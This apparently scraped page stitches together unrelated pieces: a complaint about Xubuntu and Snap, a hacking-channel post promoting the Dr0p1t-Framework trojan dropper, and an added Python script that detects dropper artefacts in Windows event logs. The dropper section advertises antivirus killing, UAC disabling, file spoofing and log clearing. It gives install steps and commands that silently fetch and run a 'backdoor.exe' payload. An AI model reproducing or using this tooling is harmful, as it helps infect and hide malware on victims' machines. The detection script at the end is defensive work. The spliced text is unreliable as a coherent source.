The base is Xubuntu, that is, in fact, Ubuntu. If you have installed the latest versions of Ubuntu, you may have noticed how many shortcuts there are for different cloud services that most people do not need. It looks like Windows running a virus that has installed a couple of dozen shortcuts.

> It got to the point that Linux Mint (based on Ubuntu) BLOCKS the Snap installation (developed by Canonical Ltd.), which behaves like a real trojan: it installs hidden, secretly overwrites some of the packages, and secretly connects to remote servers. This was said last year ( https://blog.linuxmint.com/?p=3766 ) and repeated again this year ( https://blog.linuxmint.com/?p=3906 ).

> My personal use of Ubuntu evoked only negative emotions. Constantly occurring errors and the offer to send a report; I already had a similar OS, it was called Windows 98.

2) Unsuccessful tuning of the desktop environment
The distribution uses XFCE, but it is made to look like GNOME 3. Result: it is almost impossible to find and open a minimized application. Overall, the desktop gives the feeling that "showing off matters more than usability".

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Create an undetectable malware (Dr0p1t-Framework):
Have you ever heard about trojan droppers? In short, a dropper is a type of malware that downloads other malware, and Dr0p1t gives you the chance to create a stealthy dropper that, according to its README, bypasses most AVs and has a lot of tricks (Trust me :D) ;)

🦑 FEATURES (as listed by the project):

The executable is smaller than other droppers generated the same way.

Downloads an executable to the target system and runs it silently.
Self-destruct function, so the dropper kills and deletes itself after finishing its work.

Tries to defeat disk forensics: every file the dropper creates, and the dropper itself, has its content wiped before deletion.
Clears the event log after finishing.

Works on Windows and Linux, and now has OSX support.

Dr0p1t-Server feature (beta), so you can work from a browser; see how to work with Dr0p1t-Server.

Dr0p1t-Server has a scam option (beta); see how to work with Dr0p1t-Server.

Finds and kills antivirus before running the malware.

Can disable UAC.

Can run your malware as admin.

Full spoofing: spoofs the file icon and extension to anything you want.

ZIP file support, so you can compress your executable to a zip file before uploading.

Runs a custom (batch | powershell | vbs) file of your choice before running the executable.

When running PowerShell scripts it can bypass the execution policy.
Uses UPX to compress the dropper after creating it.


INSTALLATION & RUN:

1️⃣ git clone https://github.com/D4Vinci/Dr0p1t-Framework.git

2️⃣ cd Dr0p1t-Framework

3️⃣ chmod +x install.sh
(the recursive chmod 777 some posts suggest is unnecessary and makes every file in the tree world-writable)

4️⃣ ./install.sh

5️⃣ python Dr0p1t.py

6️⃣ Examples:

./Dr0p1t.py Malware_Url [Options]
./Dr0p1t.py https://test.com/backdoor.exe -s -t -a -k --runas --upx
./Dr0p1t.py https://test.com/backdoor.exe -k -b block_online_scan.bat --only32
./Dr0p1t.py https://test.com/backdoor.exe -s -t -k -p Enable_PSRemoting.ps1 --runas
./Dr0p1t.py https://test.com/backdoor.zip -t -k --nouac -i flash.ico --spoof pdf --zip


ENJOY❤️👍🏻
✅ topic git sources
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
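Every trick in that feature list leaves something behind on the host, and the check a defender wants is how to spot them. The block below is an added detection example written for this page; it is not Dr0p1t code and makes no claim about how Dr0p1t implements any feature. It runs a few rules over constructed, simplified Windows event records (the dict keys "image", "cmdline", "target" and "details" are this example's shorthand for the Sysmon fields Image, CommandLine, TargetObject and Details). The facts it relies on: a cleared Security log is Security event 1102 and a cleared System log is System event 104; UAC is switched off by setting EnableLUA to 0 under HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System, which Sysmon reports as a registry value set (event 13); and icon/extension spoofing usually shows up as a double extension (invoice.pdf.exe) or a Unicode right-to-left override in the file name. The list of security-product process names is illustrative.

```python
"""Detection rules for dropper artefacts: spoofed names, AV kills, UAC off, cleared logs (added example)."""
import ntpath
from typing import Dict, List, Optional, Tuple

RLO, LRO = "\u202e", "\u202d"                                # bidi overrides used to hide a real extension
EXEC_EXT = {"exe", "scr", "com", "pif", "bat", "cmd", "vbs", "js", "ps1", "hta"}
DOC_EXT = {"pdf", "doc", "docx", "xls", "xlsx", "jpg", "png", "txt"}
# Illustrative process names a dropper might try to kill (assumption: extend for the products you run).
SECURITY_PROCS = {"msmpeng.exe", "mssense.exe", "avp.exe", "mbamservice.exe"}
ENABLELUA_SUFFIX = "\\policies\\system\\enablelua"


def spoofed_name(filename: str) -> Optional[str]:
    """Why a file name looks spoofed, or None: bidi override, or document-extension.executable-extension."""
    if RLO in filename or LRO in filename:
        return "bidi override in filename"
    parts = filename.lower().split(".")
    if len(parts) >= 3 and parts[-1] in EXEC_EXT and parts[-2] in DOC_EXT:
        return "double extension"
    return None


def analyse(events: List[Dict]) -> List[Tuple[str, str]]:
    """Run the rules over simplified event records; returns (rule, evidence) in event order."""
    alerts: List[Tuple[str, str]] = []
    for ev in events:
        ch, eid = ev["channel"], ev["id"]
        if ch == "Sysmon" and eid == 1:                       # process creation
            name = ntpath.basename(ev["image"])
            why = spoofed_name(name)
            if why:
                alerts.append((why, name))
            cmd = ev.get("cmdline", "").lower()
            if "taskkill" in cmd and "/im" in cmd and any(p in cmd for p in SECURITY_PROCS):
                alerts.append(("security tool kill", ev["cmdline"]))
        elif ch == "Sysmon" and eid == 13:                    # registry value set
            if ev["target"].lower().endswith(ENABLELUA_SUFFIX) and ev["details"].endswith("(0x00000000)"):
                alerts.append(("UAC disabled", ev["target"]))
        elif ch == "Security" and eid == 1102:
            alerts.append(("audit log cleared", "Security 1102"))
        elif ch == "System" and eid == 104:
            alerts.append(("event log cleared", "System 104: " + ev.get("log", "?")))
    return alerts


# Constructed sample events, in the order a dropper run might produce them (not real telemetry).
SAMPLE_EVENTS: List[Dict] = [
    {"channel": "Sysmon", "id": 1, "image": r"C:\Users\bob\Downloads\Invoice_2020.pdf.exe", "cmdline": ""},
    {"channel": "Sysmon", "id": 1, "image": r"C:\Users\bob\Downloads\holiday_" + RLO + "gnp.exe", "cmdline": ""},
    {"channel": "Sysmon", "id": 1, "image": r"C:\Windows\System32\taskkill.exe",
     "cmdline": "taskkill /F /IM MsMpEng.exe"},
    {"channel": "Sysmon", "id": 13,
     "target": r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA",
     "details": "DWORD (0x00000000)"},
    {"channel": "Sysmon", "id": 1, "image": r"C:\Windows\System32\notepad.exe", "cmdline": "notepad.exe"},
    {"channel": "Security", "id": 1102},
    {"channel": "System", "id": 104, "log": "System"},
]

if __name__ == "__main__":
    for rule, evidence in analyse(SAMPLE_EVENTS):
        print(f"{rule}: {evidence}")
```

The rules are deliberately coarse; in practice you would feed them from a SIEM query over the same event IDs and whitelist the administrators who legitimately clear logs, but each one corresponds directly to a feature in the list above, which is the point: the more a dropper does on the host, the more it writes into the very logs it then has to clear.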
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁